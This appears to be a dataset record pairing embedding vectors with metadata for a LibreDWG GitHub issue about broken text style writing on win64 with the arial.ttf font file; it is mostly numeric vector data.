0.0236844290047884, -0.01113950740545988, -0.009143180213868618, 0.00011117049143649638, 0.0009312867769040167, -0.012377230450510979, -0.004487744066864252, 0.011331154964864254, 0.00815300177782774, 0.0009297895594500005, 0.019436243921518326, 0.0030843259301036596, 0.01942027360200882, -0.005430010613054037, 0.0054379962384700775, -0.006811469327658415, 0.01533978059887886, 0.004779207985848188, 0.01724826917052269, 0.01028507947921753, -0.005757408682256937, -0.00407650088891387, -0.0033418522216379642, 0.03028029575943947, -0.025377314537763596, -0.02405175380408764, -0.021145101636648178, 0.013798615895211697, 0.0038489194121211767, -0.006971175782382488, 0.03749901428818703, -0.013942351564764977, -0.013567041605710983, -0.028906822204589844, -0.0003877866256516427, -0.004048552364110947, -0.014501322992146015, 0.0022498611360788345, 0.004623494576662779, 0.015275898389518261, -0.004723310936242342, -0.00794538389891386, 0.0062165637500584126, -0.006563924718648195, -0.01333546731621027, 0.017759328708052635, 0.008368604816496372, -0.009294901043176651, -0.028619350865483284, 0.017136475071310997, -0.009167135693132877, 0.014014218933880329, 0.004367964807897806, 0.0071508451364934444, -0.014413484372198582, -0.007314544171094894, -0.008999444544315338, 0.014046160504221916, -0.003727143397554755, -0.03606165945529938, -0.023700399324297905, 0.01782321184873581, 0.022518575191497803, -0.00777369923889637, -0.009718121960759163, -0.014796779491007328, 0.00046838834532536566, 0.010500682517886162, 0.012441112659871578, 0.0017358068143948913, -0.0033717972692102194, 0.006268468219786882, 0.023780252784490585, 0.010317020118236542, -0.01536373607814312, 0.009055341593921185, -0.013758689165115356, 0.005086642690002918, 0.013239644467830658, -0.002174000721424818, -0.0029126417357474566, -0.005769386421889067, 0.003252017544582486, 0.018334271386265755, 0.016345929354429245, -0.00777369923889637, -0.024530872702598572, -0.023029634729027748, -0.018366213887929916, 0.007378426380455494, 0.019564010202884674, 0.02068195305764675, -0.05247945711016655, -0.0014303686330094934, -0.018446065485477448, -0.01155474316328764, -0.023828165605664253, 0.004475766327232122, 0.025664785876870155, -0.016194209456443787, 0.011506832204759121, 0.0006972173578105867, -0.013750704005360603, -0.003483591601252556, -0.003557455725967884, -0.014565205201506615, 0.030951062217354774, 0.0012247469276189804, -0.0011019727680832148, -0.034432657063007355, -0.020186863839626312, -0.014597146771848202, -0.017216328531503677, -0.010987786576151848, -0.0013594990596175194, -0.0026371486019343138, 0.011890126392245293, -0.021081218495965004, -0.018989067524671555, -0.015291868709027767, 0.006260483060032129, 0.029928941279649734, 0.011259287595748901, 0.0011918075615540147, -0.007841574028134346, 0.003994651138782501, 0.005034737754613161, 0.014924544841051102, 0.004280126187950373, -0.0118422145023942, 0.014485352672636509, -0.00006229165592230856, 0.010875992476940155, 0.031893327832221985, -0.0018745515262708068, 0.010229182429611683, 0.0050307451747357845, -0.007202749606221914, -0.010995771735906601, -0.0013085927348583937, -0.031685709953308105, -0.03321889042854309, -0.0016399830346927047, -0.016864974051713943, -0.014189896173775196, -0.012233494780957699, 0.016130326315760612, -0.008696002885699272, -0.014389528892934322, -0.026846611872315407, 0.00854428205639124, -0.001535175833851099, 0.02384413592517376, -0.02031462825834751, 0.031206591054797173, -0.00792941264808178, 0.026942435652017593, -0.01331151183694601, -0.005761401262134314, 0.0020961437840014696, -0.010317020118236542, 0.02360457554459572, 0.014836706221103668, 0.0012886293698102236, -0.008664061315357685, 0.01643376797437668, -0.01548351626843214, -0.015563368797302246, 0.00819292850792408, 0.030424030497670174, -0.0051225763745605946, 0.005465944763273001, 0.010979801416397095, -0.006743594538420439, -0.007494213525205851, 0.012281406670808792, 0.0036213381681591272, -0.007733772974461317, -0.008759885095059872, 0.005094627849757671, -0.004006629344075918, 0.004807156510651112, -0.03411324322223663, -0.008656076155602932, -0.005174480844289064, -0.00554979033768177, 0.005637628957629204, -0.00020599603885784745, -0.005593709647655487, -0.021448543295264244, -0.007657912094146013, -0.012489024549722672, 0.010596506297588348, -0.004136390518397093, 0.003242035862058401, 0.013295541517436504, 0.010572550818324089, -0.0004284617898520082, -0.014637073501944542, -0.010899947956204414, 0.0010201233671978116, 0.016417797654867172, 0.005473929923027754, -0.01351912971585989, -0.012361260131001472, -0.022582456469535828, -0.014445425942540169, 0.004998804070055485, 0.002675078809261322, -0.011043683625757694, -0.012600819580256939, -0.010380903258919716, 0.0007820613100193441, -0.0005350157734937966, 0.023333076387643814, -0.004487744066864252, -0.0006488064536824822, 0.0168809462338686, -0.01929250918328762, -0.02991297096014023, 0.00034237015643157065, 0.004431847017258406, 0.017312152311205864, 0.0030823296401649714, -0.025632845237851143, 0.005793342366814613, -0.016817063093185425, 0.016992740333080292, 0.02298172190785408, -0.006955204997211695, 0.0007875512237660587, 0.016817063093185425, -0.00785355269908905, -0.000054399923101300374, 0.007977324537932873, -0.020745836198329926, 0.007063006516546011, -0.013047996908426285, -0.01046874187886715, -0.0027808842714875937, 0.027373643592000008, 0.0011209378717467189, 0.01188214123249054, 0.013646895065903664, -0.016497651115059853, -0.00770183140411973, 0.017551710829138756, -0.0031502048950642347, -0.003547474043443799, 0.008807796984910965, 0.0030563774053007364, -0.014804764650762081, 0.009949696250259876, 0.002601214684545994, 0.008005273528397083, 0.022023485973477364, -0.02036254107952118, -0.01863771304488182, -0.002577258739620447, -0.0022678279783576727, 0.0209374837577343, 0.001921465271152556, 0.009694166481494904, 0.012800452299416065, -0.0005200433079153299, 0.005541805177927017, -0.015307839028537273, 0.0056496066972613335, -0.004990818910300732, 0.01675317995250225, -0.0003276472561992705, -0.02822008542716503, 0.015643222257494926, 0.007278610020875931, -0.0008100098930299282, -0.0003870379878208041, -0.009861857630312443, 0.005493893288075924, -0.0039167944341897964, -0.020586129277944565, 0.024211460724473, 0.027724996209144592, -0.003383775008842349, -0.0010710296919569373, -0.01991536282002926, 0.019611921161413193, 0.02782081998884678, -0.019468186423182487, 0.01032500620931387, -0.018382184207439423, -0.007693846244364977, 0.025201639160513878, -0.0020053109619766474, -0.012337303720414639, -0.024259371683001518, 0.006388247944414616, 0.0007062008371576667, 0.005094627849757671, -0.0036612646654248238, -0.00991775467991829, -0.016010547056794167, -0.02376428246498108, -0.004244192503392696, 0.005138547159731388, -0.00766989029943943, 0.014261763542890549, -0.013327482156455517, 0.01536373607814312, -0.001706860028207302, 0.0022837987635284662, 0.017759328708052635, -0.005258326418697834, -0.005374113563448191, 0.0075341397896409035, -0.004455802962183952, 0.0051824660040438175, -0.0012966147623956203, -0.009622298181056976, -0.013758689165115356, -0.0068354252725839615, -0.0020262724719941616, 0.012273421511054039, 0.003132237819954753, -0.008839738555252552, 0.009766033850610256, -0.004887009505182505, -0.005062686745077372, -0.000017873369870358147, 0.008823767304420471, -0.0030384105630218983, -0.020905541256070137, 0.02847561612725258, 0.0032080982346087694, 0.005150524899363518, -0.018749507144093513, -0.009494533762335777, -0.0249940212816, 0.0031462120823562145, 0.013942351564764977, -0.021001365035772324, -0.0010460756020620465, -0.03133435547351837, -0.004256170243024826, -0.014413484372198582, 0.00040076274308376014, -0.011187419295310974, -0.005186459049582481, -0.0038648899644613266, -0.016497651115059853, 0.0011628607753664255, 0.01905294880270958, 0.003178153419867158, 0.014708940871059895, -0.013974292203783989, 0.0002757427282631397, 0.021895719692111015, 0.006172644440084696, -0.009382739663124084, -0.006080813705921173, 0.002403578255325556, 0.0029785207007080317, -0.0030204434879124165, -0.007725787349045277, 0.0024794386699795723, -0.010971816256642342, -0.00022595931659452617, 0.007897472009062767, -0.005697518587112427, 0.005422025453299284, -0.005278289783746004, 0.0067635574378073215, -0.01913280226290226, 0.0017937002703547478, 0.03289947658777237, 0.011267272755503654, 0.017392005771398544, 0.016210179775953293, 0.0034895804710686207, -0.01561128068715334, -0.009574386291205883, -0.0018146616639569402, -0.0001845355291152373, 0.000997165567241609, -0.0002267079398734495, -0.028603380545973778, 0.014708940871059895, 0.009486548602581024, 0.02510581538081169, -0.0034895804710686207, -0.0006293422193266451, 0.014828721061348915, -0.0030483920127153397, -0.008097104728221893, -0.000530524062924087, -0.0020312631968408823, 0.009598342701792717, -0.0007640943513251841, -0.006484071724116802, -0.004284118767827749, 0.00290864915587008, -0.0037491030525416136, -0.0018605772638693452, 0.004336023237556219, 0.031526003032922745, -0.014932530000805855, -0.017679477110505104, 0.014086087234318256, 0.0030983001925051212, 0.010780168697237968, 0.029066529124975204, -0.0034676208160817623, -0.0068673668429255486, -0.0037391213700175285, 0.00971013680100441, -0.012744555249810219, -0.01850994862616062, -0.02531343325972557, 0.02887488156557083, -0.01659347489476204, 0.007913442328572273, 0.015954649075865746, -0.0006972173578105867, -0.0081130750477314, -0.007613993249833584, 0.0018555864226073027, -0.0048790243454277515, 0.012568878009915352, -0.029976854100823402, 0.006911285687237978, 0.026942435652017593, 0.018957126885652542, -0.01490857359021902, 0.002962549915537238, -0.006535976193845272, 0.0018376194639131427, 0.013391365297138691, -0.012177597731351852, -0.000879382248967886, -0.0037570884451270103, 0.0013515136670321226, 0.003168171737343073, -0.01351912971585989, 0.01577897183597088, 0.0024275342002511024, -0.008688017725944519, -0.0187175665050745, -0.007330514490604401, 0.009486548602581024, 0.012584848329424858, 0.017567681148648262, -0.004603531211614609, -0.009055341593921185, -0.006679711863398552, 0.0031841422896832228, 0.006400226149708033, -0.018174566328525543, 0.019260568544268608, 0.0041603464633226395, 0.014956485480070114, 0.0008589199278503656, -0.009326841682195663, -0.0017188380006700754, 0.032995302230119705, 0.013694806955754757, -0.012281406670808792, 0.008967502973973751, 0.007442309055477381, 0.010237167589366436, 0.008448458276689053, 0.023987870663404465, 0.010684344917535782, 0.011267272755503654, 0.007198757026344538, -0.00601293845102191, -0.012752540409564972, 0.021400630474090576, 0.020218804478645325, -0.012017891742289066, 0.02117704227566719, -0.007082969881594181, -0.0024734498001635075, -0.017423946410417557, 0.002575262449681759, -0.0030503885354846716, -0.017551710829138756, -0.018206506967544556, -0.0077896700240671635, 0.002629163209348917, 0.031142709776759148, -0.012449098750948906, 0.003214087337255478, -0.01120338961482048, -0.012121700681746006, 0.014645058661699295, -0.0012526954524219036, -0.0012097745202481747, 0.006080813705921173, -0.02798052690923214, -0.011746390722692013, 0.006943227257579565, 0.004795178771018982, -0.005422025453299284, -0.014038175344467163, -0.02339695766568184, -0.0013235651422291994, 0.01986745186150074, -0.0034097274765372276, 0.006891322322189808, -0.018382184207439423, -0.013606968335807323, 0.019484156742691994, -0.0157071053981781, -0.0062485053204, -0.005374113563448191, 0.008065163157880306, 0.01983550935983658, 0.007350477855652571, -0.0010580535745248199, -0.011434963904321194, 0.028252026066184044, 0.01675317995250225, 0.009630284272134304, 0.003018447197973728, -0.005022760014981031, 0.010660388506948948, 0.026734817773103714, 0.010173285380005836, 0.009095268324017525, 0.005078657064586878, -0.01991536282002926, 0.01814262382686138, -0.009518489241600037, -0.01646570861339569, 0.006220556329935789, -0.016401827335357666, 0.0021420593839138746, -0.0023237252607941628, -0.01942027360200882, 0.010277094319462776, -0.000050719194405246526, -0.00764992693439126, 0.004883016925305128, -0.0039627100341022015, -0.0030483920127153397, -0.014477367512881756, 0.015124177560210228, -0.0026890530716627836, 0.011866170912981033, -0.01124331634491682, -0.033442478626966476, 0.01630600355565548, -0.0026331560220569372, -0.005897151306271553, 0.009885814040899277, -0.0155074717476964, 0.023317106068134308, 0.004455802962183952, 0.03654078021645546, -0.0016100381035357714, 0.014309675432741642, -0.01659347489476204, -0.00989379920065403, -0.014772823080420494, -0.012560892850160599, 0.023285163566470146, -0.002038250444456935, -0.0033438485115766525, 0.0012237487826496363, 0.006016931030899286, -0.02785276062786579, 0.0032460284419357777, -0.029066529124975204, 0.019691774621605873, 0.010532624088227749, -0.011874156072735786, 0.0007860539481043816, 0.0016060455236583948, 0.002766910009086132, 0.014022204093635082, -0.015164103358983994, -0.00008908611198421568, -0.008767870254814625, -0.011930053122341633, 0.009478563442826271, -0.011498846113681793, -0.009183106943964958, 0.01157071441411972, -0.0004157352086622268, 0.013686821796000004, -0.012201554141938686, 0.0020053109619766474, -0.006384255364537239, 0.0031641791574656963, 0.006971175782382488, -0.0353270098567009, -0.00989379920065403, 0.0038988275919109583, -0.002854748396202922, -0.003763077314943075, -0.013646895065903664, -0.006512020248919725, 0.0074862283654510975, -0.026207787916064262, -0.0032899477519094944, 0.0062285419553518295, 0.015148133039474487, -0.021943632513284683, -0.0350714810192585, -0.015946663916110992, 0.004348001442849636, -0.0047871931456029415, 0.0025572956074029207, -0.010340976528823376, -0.015291868709027767, 0.010372918099164963, 0.03222871199250221, 0.02360457554459572, -0.0033338668290525675, -0.0004072508017998189, -0.006516012828797102, 0.008696002885699272, 0.023173369467258453, -0.00592909287661314, -0.007250661496073008, -0.027261847630143166, -0.009694166481494904, 0.007985309697687626, 0.007869523018598557, 0.021704072132706642, -0.004887009505182505, -0.0007151843165047467, -0.008344649337232113, 0.002711012726649642, -0.011418993584811687, -0.003619341878220439, -0.009262959472835064, 0.013255614787340164, -0.005034737754613161, 0.0022558500058948994, -0.004902980290353298, 0.016705268993973732, 0.0021260888315737247, 0.0017657516291365027, -0.0018446065951138735, -0.0043919202871620655, -0.0002685060608200729, 0.018366213887929916, 0.00047462686779908836, 0.0029845095705240965, -0.007845567539334297, -0.014637073501944542, 0.01374271884560585, -0.0034676208160817623, -0.004080493468791246, 0.017360063269734383, 0.010484712198376656, -0.0034895804710686207, -0.007518169470131397, -0.013670850545167923, 0.01978759840130806, 0.013854512944817543, 0.008935562334954739, -0.006116747390478849, -0.01359898317605257, -0.0012257450725883245, 0.006571910344064236, 0.00786553043872118, -0.008432487025856972, 0.014413484372198582, 0.0001051191211445257, -0.005761401262134314, 0.002112114569172263, 0.028523527085781097, -0.006983153522014618, -0.003359819296747446, -0.010261123068630695, -0.015595310367643833, -0.02973729372024536, 0.015132162719964981, 0.014301690272986889, 0.021688101813197136, 0.0032999294344335794, 0.021783925592899323, 0.018206506967544556, -0.008751899935305119, -0.0016749188071116805, 0.0028327887412160635, 0.016561532393097878, -0.00590912951156497, -0.002279805950820446, 0.0018146616639569402, 0.04104449227452278, -0.010708300396800041, -0.008688017725944519, -0.02572866901755333, -0.00761798582971096, 0.007482235319912434, 0.03154197335243225, 0.013447262346744537, -0.01708856411278248, 0.011075625196099281, -0.006779528222978115, 0.020841659978032112, 0.015595310367643833, -0.0034895804710686207, 0.03064762055873871, -0.009159150533378124, 0.01913280226290226, -0.002415556227788329, -0.008783840574324131, 0.018222477287054062, 0.009183106943964958, 0.015667177736759186, -0.0018106690840795636, 0.0015142144402489066, -0.004843090660870075, -0.004060530103743076, -0.012560892850160599, 0.015347765758633614, 0.01863771304488182, -0.019228626042604446, -0.010963831096887589, -0.006627807393670082, 0.01130719855427742, -0.001849597436375916, -0.015451574698090553, -0.02044239453971386, 0.01654556207358837, -0.006220556329935789, -0.004336023237556219, -0.0007071990403346717, 0.016401827335357666, -0.007749743293970823, -0.0036952022928744555, -0.024211460724473, 0.0010191252222284675, 0.008759885095059872, -0.022582456469535828, 0.027948584407567978, 0.0276132021099329, 0.02727781981229782, 0.0029565610457211733, -0.015986591577529907, 0.01724826917052269, 0.01892518438398838, 0.0072426763363182545, -0.019516097381711006, -0.012512980960309505, -0.012441112659871578, -0.014804764650762081, 0.018238447606563568, -0.009286915883421898, -0.00579733494669199, 0.0006802486022934318, 0.00006297789514064789, 0.00579733494669199, -0.0007980319205671549, 0.026319582015275955, 0.024978049099445343, 0.014597146771848202, 0.012057818472385406, 0.022965751588344574, -0.003868882777169347, 0.0017308159731328487, -0.003196120262145996, 0.011395037174224854, 0.01552344299852848, -0.012752540409564972, 0.02195960283279419, 0.03072747215628624, -0.011722435243427753, 0.016210179775953293, 0.009159150533378124, -0.01614629663527012, -0.020953454077243805, -0.0061367107555270195, 0.006887329742312431, -0.007769706659018993, 0.02187974937260151, -0.00608480628579855, 0.01159466989338398, -0.005625650752335787, 0.009510504081845284, 0.013503159396350384, 0.004603531211614609, 0.006919271312654018, -0.0345604233443737, 0.01376667432487011, -0.012121700681746006, 0.013686821796000004, 0.00015883280138950795, -0.008600179105997086, -0.016313988715410233, -0.010476727038621902, 0.02793261408805847, 0.04420667514204979, 0.013279570266604424, -0.01728021167218685, -0.00995768141001463, 0.014972456730902195, -0.0059730117209255695, -0.03465624526143074, 0.02002715691924095, -0.008121060207486153, 0.04200273007154465, 0.0015770987374708056, -0.01399026345461607, 0.00950251892209053, 0.016817063093185425, -0.012728583998978138, 0.0007186778821051121, 0.004204265773296356, 0.0014493337366729975, -0.00012040349974995479, 0.00755809573456645, 0.020250746980309486, -0.01978759840130806, -0.0022877913434058428, 0.0035334997810423374, 0.003653279272839427, 0.0023916002828627825, -0.002683064201846719, -0.025249550119042397, -0.010053505189716816, -0.0013095908798277378, 0.01316777616739273, -0.007613993249833584, -0.005957041401416063, 0.0002794858592096716, -0.017376035451889038, -0.002215923508629203, -0.02052224613726139, -0.009702151641249657, 0.004743274301290512, 0.008141023106873035, -0.024594753980636597, -0.001122934278100729, -0.00031941241468302906, 0.00289267860352993, -0.007398389745503664, -0.0017827204428613186, 0.0077217947691679, -0.020745836198329926, 0.003537492360919714, 0.00829673744738102, 0.006192607805132866, 0.012880304828286171, -0.0037111728452146053, -0.004571590106934309, 0.004304082132875919, 0.011379066854715347, -0.0015132162952795625, 0.0054978858679533005, 0.012952173128724098, -0.020618069916963577, -0.004887009505182505, -0.004827119875699282, 0.003250021254643798, 0.024834314361214638, -0.012465069070458412, -0.02138466015458107, -0.0027429540641605854, -0.0016369885997846723, 0.006376270204782486, -0.007278610020875931, -0.005162503104656935, -0.010356946848332882, 0.027086172252893448, 0.0030124580953270197, -0.011650566942989826, 0.012361260131001472, 0.0227741040289402, 0.009382739663124084, -0.013710777275264263, 0.004591553471982479, -0.003411723766475916, -0.022582456469535828, 0.004367964807897806, 0.007841574028134346, 0.018781449645757675, -0.010476727038621902, -0.009350798092782497, -0.011251301504671574, 0.00995768141001463, 0.01188214123249054, -0.002413559937849641, 0.0011958001414313912, -0.032180801033973694, -0.023317106068134308, 0.01704065129160881, 0.0004282122536096722, -0.0011528790928423405, 0.0004958378267474473, -0.0080491928383708, 0.0024175525177270174, 0.0005949055776000023, 0.015922708436846733, 0.018014859408140182, 0.006388247944414616, -0.008935562334954739, 0.01876547932624817, 0.006967183202505112, 0.010684344917535782, 0.015060294419527054, -0.011730420403182507, 0.018414124846458435, 0.0067755356431007385, -0.007039050571620464, -0.02654317021369934, -0.0060448795557022095, -0.028363822028040886, 0.005493893288075924, -0.030998973175883293, 0.004619501996785402, -0.0049628703854978085, 0.008416516706347466, 0.0021779933013021946, 0.024387136101722717, -0.011482875794172287, 0.004607523791491985, -0.023652488365769386, 0.0013525119284167886, -0.0010620462708175182, -0.01761559396982193, -0.02363651804625988, -0.004807156510651112, -0.0021660153288394213, 0.00617663748562336, -0.014565205201506615, 0.05826082080602646, 0.0040685152634978294, 0.004627487156540155, 0.02080971747636795, 0.005402062088251114, 0.0036233344580978155, 0.0023536700755357742, -0.00971013680100441, -0.01929250918328762, -0.008129045367240906, -0.00968618132174015, -0.018701596185564995, 0.02876308746635914, -0.0007246668683364987, 0.013383379206061363, -0.014421469531953335, -0.011762361973524094, 0.006807476747781038, 0.004104449413716793, -0.003483591601252556, -0.003956721164286137, -0.027006318792700768, 0.017647534608840942, -0.001626008772291243, -0.0017078581731766462, 0.028331879526376724, 0.00788948591798544, 0.009406695142388344, 0.017887094989418983, -0.023444870486855507, 0.0008339658379554749, 0.01908489130437374, 0.00007430081313941628, -0.013654880225658417, 0.009270944632589817, 0.021193012595176697, -0.0017577663529664278, 0.02510581538081169, -0.012345288880169392, -0.006112754810601473, 0.03273976966738701, 0.002705023856833577, 0.0026910495944321156, -0.010971816256642342, -0.000008110080671031028, 0.010588521137833595, 0.012640745379030704, -0.00554979033768177, 0.0018386176088824868, -0.006416196469217539, 0.0014742878265678883, 0.011746390722692013, -0.007146852556616068, -0.015347765758633614, -0.006492056883871555, -0.0019883422646671534, -0.006164659280329943, -0.01003753487020731, -0.0121696125715971, -0.012193568050861359, -0.004124412778764963, -0.004487744066864252, 0.002898667473345995, 0.014724912121891975, -0.013439277186989784, -0.0018545882776379585, 0.01395033672451973, 0.014637073501944542, -0.01347920298576355, 0.004212250933051109, 0.020043127238750458, 0.01659347489476204, 0.015108206309378147, 0.008432487025856972, -0.002503394614905119, -0.014565205201506615, 0.01349517423659563, 0.009821930900216103, -0.006160666700452566, 0.004040566738694906, -0.024099664762616158, -0.008959517814218998, 0.0008344649104401469, -0.000646810105536133, -0.020186863839626312, -0.012816422618925571, 0.0077058239839971066, -0.012361260131001472, -0.00981394574046135, 0.008919591084122658, -0.00028597391792573035, 0.013902424834668636, -0.015004397369921207, 0.009558415971696377, 0.0013984274119138718, -0.009414680302143097, -0.00960632786154747, 0.013750704005360603, 0.003162182867527008, -0.00556975370272994, -0.02473849058151245, -0.016353914514183998, -0.021001365035772324, -0.01868562586605549, 0.006895315367728472, -0.0061966003850102425, -0.026798700913786888, -0.00017180893337354064, -0.00821688398718834, 0.015212015248835087, -0.009718121960759163, 0.015986591577529907, -0.0124970106408, 0.01753574050962925, -0.007498206105083227, 0.003787033259868622, 0.003908809274435043, 0.01161064114421606, -0.0017917039804160595, -0.010356946848332882, -0.016034502536058426, -0.008735929615795612, 0.027150053530931473, 0.0012766513973474503, -0.0157071053981781, 0.006344328634440899, 0.005134554114192724, 0.03261200711131096, 0.0007236687233671546, 0.008927576243877411, -0.014852676540613174, -0.023732341825962067, 0.002263835398480296, 0.017296181991696358, 0.007442309055477381, 0.013854512944817543, 0.013143820688128471, 0.005162503104656935, 0.002647130284458399, 0.0012047836789861321, -0.019979245960712433, 0.027868732810020447, 0.0016549555584788322, 0.004383935127407312, -0.0021520410664379597, 0.01659347489476204, -0.003994651138782501, -0.0026451339945197105, -0.003252017544582486, -0.014772823080420494, 0.02261439710855484, 0.002164019038900733, 0.01957998052239418, 0.0007820613100193441, -0.0077217947691679, 0.0027070201467722654, 0.008528310805559158, 0.02167213149368763, -0.026111964136362076, 0.014980441890656948, 0.006488064303994179, -0.009294901043176651, 0.0023696408607065678, -0.00615667412057519, -0.0020701915491372347, 0.0023396958131343126, -0.002808832796290517, 0.006743594538420439, 0.01515611819922924, -0.007110918406397104, -0.012161627411842346, -0.004898987710475922, 0.0012497010175138712, -0.010780168697237968, 0.01589076779782772, -0.010412843897938728, 0.0010840058093890548, -0.004395913332700729, 0.002183982403948903, -0.004910965450108051, 0.006172644440084696, -0.013854512944817543, -0.018829360604286194, -0.0005819294601678848, 0.010372918099164963, -0.005158510059118271, -0.013407335616648197, -0.01345524750649929, -0.012457083910703659, 0.009901784360408783, 0.0018086726777255535, -0.002387607702985406, 0.000880380452144891, -0.0024734498001635075, -0.015251941978931427, 0.0025373322423547506, -0.00001260961562365992, -0.007989302277565002, 0.01200192142277956, -0.02633555233478546, 0.003293940331786871, 0.00005212286487221718, -0.0017807241529226303, 0.0277409665286541 ]
1,732
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
With font_file: arial.ttf (EED name "Arial", flag 34).
Broken Text Style write on win64 only
https://api.github.com/repos/LibreDWG/libredwg/issues/346/comments
144
2021-06-03T16:46:20
2024-07-05T13:42:17Z
https://github.com/LibreDWG/libredwg/issues/346
910,678,516
346
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Broken Text Style write on win64 only Issue date: --- start body --- With font_file: arial.ttf (EED name "Arial", flag 34). --- end body ---
202
[ -0.0400322787463665, -0.00172154582105577, -0.009572283364832401, 0.013066091574728489, 0.04372895509004593, 0.034772783517837524, -0.0005043481360189617, 0.05367691442370415, -0.013231390155851841, 0.0022484345827251673, 0.029498260468244553, 0.00945957936346531, -0.004448031075298786, -0.020436899736523628, -0.023863086476922035, 0.016439681872725487, -0.01345679722726345, 0.015019618906080723, 0.01991095021367073, -0.007502295542508364, 0.009985528886318207, 0.018408237025141716, -0.004819952882826328, 0.06019869074225426, -0.005774175748229027, 0.00919660460203886, -0.01299095619469881, -0.014846806414425373, 0.013982746750116348, -0.018182829022407532, -0.016755253076553345, 0.017626825720071793, 0.02840127982199192, 0.01753666251897812, 0.059236954897642136, 0.012066787108778954, 0.032007791101932526, 0.069004587829113, -0.018002504482865334, 0.03423180803656578, -0.014087936840951443, -0.062272436916828156, -0.01935494691133499, 0.038018643856048584, 0.014786697924137115, 0.019445108249783516, 0.031767357140779495, 0.02160901576280594, -0.035524141043424606, 0.015207457356154919, -0.0030580214224755764, -0.00758494483307004, 0.0009415437234565616, -0.04445025697350502, 0.01636454649269581, -0.016124112531542778, 0.007524836342781782, 0.02808571048080921, -0.031556978821754456, 0.01007569208741188, -0.0314067080616951, -0.0025884234346449375, 0.008595519699156284, 0.03188757598400116, -0.050100456923246384, -0.0027123973704874516, -0.03840934857726097, 0.026598023250699043, -0.04414971545338631, 0.01636454649269581, -0.015748433768749237, -0.013411715626716614, 0.018137749284505844, 0.016589954495429993, 0.010090718977153301, -0.02778516709804535, 0.03483289107680321, 0.003118129912763834, -0.016349520534276962, 0.0061723943799734116, -0.021338528022170067, 0.0017328162211924791, -0.040392931550741196, 0.0314067080616951, -0.025591205805540085, 0.011691109277307987, -0.02429887279868126, -0.06744176894426346, -0.025350771844387054, -0.020662305876612663, -0.01836315542459488, 0.02028662897646427, 0.03567441180348396, -0.044330038130283356, -0.017656879499554634, -0.024734659120440483, -0.012051760219037533, -0.011165158823132515, -0.02526060864329338, -0.0269135944545269, -0.000511392077896744, 0.002665437525138259, -0.020091276615858078, -0.010676776990294456, 0.05367691442370415, -0.0012002921430394053, 0.017792124301195145, -0.024794768542051315, 0.024028385058045387, 0.09376930445432663, -0.007378322072327137, 0.007393348962068558, -0.005312091205269098, 0.013201335445046425, -0.02767997793853283, 0.03215806186199188, 0.04135466739535332, -0.026252400130033493, -0.02222512848675251, 0.02115820161998272, -0.01897926814854145, -0.025305690243840218, -0.020196465775370598, -0.013404201716184616, -0.02650786191225052, 0.016695143654942513, -0.04237651452422142, -0.016064004972577095, -0.030535131692886353, 0.018889104947447777, -0.014042855240404606, -0.00779156805947423, 0.029693612828850746, 0.008182273246347904, 0.015778489410877228, 0.013990259729325771, -0.05977793037891388, 0.024449143558740616, -0.016830388456583023, 0.001949770376086235, -0.03191762790083885, -0.04928899183869362, 0.01470404863357544, -0.037808265537023544, -0.04751579090952873, -0.004583275411278009, -0.0012754278723150492, -0.0105265062302351, 0.03768804669380188, 0.014335883781313896, -0.03462251275777817, -0.046914707869291306, 0.04517155885696411, 0.01302852388471365, 0.014403506182134151, 0.010293585248291492, -0.0198508407920599, 0.004248921759426594, 0.004444274120032787, -0.0087157366797328, -0.007408376317471266, 0.014403506182134151, 0.025906775146722794, -0.03074551187455654, -0.03600500896573067, 0.0021225824020802975, 0.0345022939145565, 0.03651593253016472, -0.02097787708044052, 0.03194768354296684, 0.01420063991099596, 0.025651315227150917, 0.018678724765777588, -0.012006678618490696, -0.07429414242506027, -0.0010904063237830997, -0.02201474830508232, 0.047575902193784714, 0.0008640601299703121, -0.01636454649269581, -0.01722109317779541, 0.018212884664535522, -0.011465702205896378, 0.009669959545135498, 0.013178794644773006, -0.019835814833641052, 0.0033961317967623472, 0.024253791198134422, 0.019550299271941185, -0.00783664919435978, -0.011788785457611084, 0.009279253892600536, 0.003645957913249731, -0.02970864064991474, 0.014756644144654274, -0.0005541255231946707, -0.001725302659906447, -0.0483272559940815, -0.011307916603982449, -0.01929483748972416, 0.0182880200445652, 0.015335188247263432, -0.014997078105807304, -0.03579463064670563, 0.011120078153908253, 0.012833170592784882, -0.04958953708410263, 0.040182553231716156, -0.0018351884791627526, -0.027424516156315804, -0.009361903183162212, -0.008069570176303387, 0.008760818280279636, 0.017040768638253212, -0.0114732151851058, 0.009271740913391113, -0.00830249022692442, 0.02523055486381054, 0.018783915787935257, -0.028686795383691788, 0.04952942952513695, -0.02970864064991474, -0.022240156307816505, -0.00667956005781889, -0.04372895509004593, -0.0040460554882884026, 0.009760122746229172, -0.008332544937729836, -0.03441213443875313, 0.014283289201557636, 0.040392931550741196, -0.0260570477694273, 0.00891860295087099, 0.032248225063085556, 0.03095589205622673, 0.0035351328551769257, 0.0012538263108581305, -0.028791984543204308, -0.042707107961177826, -0.016139140352606773, -0.0024137331638485193, 0.034562405198812485, -0.020091276615858078, -0.03260887786746025, 0.035974953323602676, 0.004680951591581106, 0.006589397322386503, 0.001699944376014173, -0.0066419923678040504, 0.0198508407920599, -0.011285376735031605, 0.011112564243376255, 0.040362875908613205, 0.028326144441962242, 0.022210100665688515, 0.003242103848606348, 0.019610406830906868, 0.011578405275940895, 0.006360233761370182, -0.022615833207964897, 0.024629469960927963, 0.016244329512119293, -0.035974953323602676, 0.034081537276506424, -0.0009143070783466101, -0.030444970354437828, -0.021113120019435883, -0.037597883492708206, -0.015267565846443176, -0.02877695858478546, 0.02115820161998272, -0.03645582124590874, -0.008084597066044807, -0.01998608559370041, -0.021729232743382454, 0.012592736631631851, 0.004647140856832266, 0.007667594123631716, 0.005278280004858971, -0.026342563331127167, -0.05448837950825691, 0.026207318529486656, 0.026342563331127167, 0.03949130326509476, -0.008633087389171124, -0.009993042796850204, -0.014606372453272343, 0.014711562544107437, -0.030009182170033455, -0.016454709693789482, 0.010894671082496643, -0.020091276615858078, -0.007400862406939268, -0.023141782730817795, -0.030009182170033455, -0.014328370802104473, 0.003997216932475567, -0.04027271270751953, 0.02408849261701107, -0.023592596873641014, 0.02805565670132637, -0.0013082997174933553, -0.008054543286561966, -0.053887296468019485, -0.005165576469153166, -0.009309308603405952, -0.009700014255940914, 0.0070815361104905605, -0.030009182170033455, 0.011247808113694191, 0.011954084038734436, -0.02819089964032173, -0.004128704778850079, 0.0077840546146035194, 